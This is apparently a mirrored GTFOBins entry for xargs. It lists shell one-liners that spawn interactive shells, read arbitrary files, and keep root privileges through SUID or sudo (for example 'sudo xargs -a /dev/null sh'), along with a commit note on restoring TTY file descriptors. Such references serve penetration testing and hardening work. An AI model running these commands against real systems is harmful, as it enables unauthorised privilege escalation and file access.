mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-12 23:12:06 +01:00
8eaf595fe6
Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged, in that case we can use `tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty)
23 lines
733 B
Markdown
23 lines
733 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- description: GNU version only.
|
|
code: xargs -a /dev/null sh
|
|
- code: echo x | xargs -Iy sh -c 'exec sh 0<&1'
|
|
- description: Read interactively from `stdin`.
|
|
code: |
|
|
xargs -Ix sh -c 'exec sh 0<&1'
|
|
x^D^D
|
|
file-read:
|
|
- description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
|
|
code: |
|
|
LFILE=file_to_read
|
|
xargs -a "$LFILE" -0
|
|
suid-enabled:
|
|
- description: GNU version only.
|
|
code: ./xargs -a /dev/null sh -p
|
|
sudo-enabled:
|
|
- description: GNU version only.
|
|
code: sudo xargs -a /dev/null sh
|
|
---
|